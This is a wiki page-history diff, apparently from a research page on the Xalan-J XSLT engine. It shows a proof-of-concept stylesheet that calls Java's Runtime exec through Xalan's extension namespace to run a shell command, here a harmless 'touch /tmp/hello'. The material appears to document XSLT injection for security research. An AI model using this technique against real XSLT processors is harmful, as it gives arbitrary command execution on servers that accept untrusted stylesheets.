Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35

From version Icon 6.1 Icon
edited by Nicolas Gregoire
on 2012/01/05 01:00
Change comment: There is no comment for this version
To version Icon 4.1 Icon
edited by Nicolas Gregoire
on 2012/01/05 00:58
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -22,15 +22,11 @@
22 22  
23 23  dcdcdd
24 24  
25 -<?xml version="1.0"?>
26 -<xsl:stylesheet
27 -
28 - xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform"
29 - xmlns:j="http:~/~/xml.apache.org/xalan/java"
30 -
31 - exclude-result-prefixes="j"
32 -
33 - version="1.0">
25 +<pre><?xml version="1.0"?>
26 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform"
27 + xmlns:j="http:~/~/xml.apache.org/xalan/java"
28 + exclude-result-prefixes="j"
29 + version="1.0">
34 34   <xsl:template match="/">
35 35   <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
36 36   <xsl:variable name="a" select="j:split($c, ' = ')"/>
... ... @@ -38,6 +38,6 @@
38 38   <xsl:variable name="p" select="j:exec($r, $a )"/>
39 39   No content at the moment ...
40 40   </xsl:template>
41 -</xsl:stylesheet>
37 +</xsl:stylesheet></pre>
42 42  
43 43  Saxon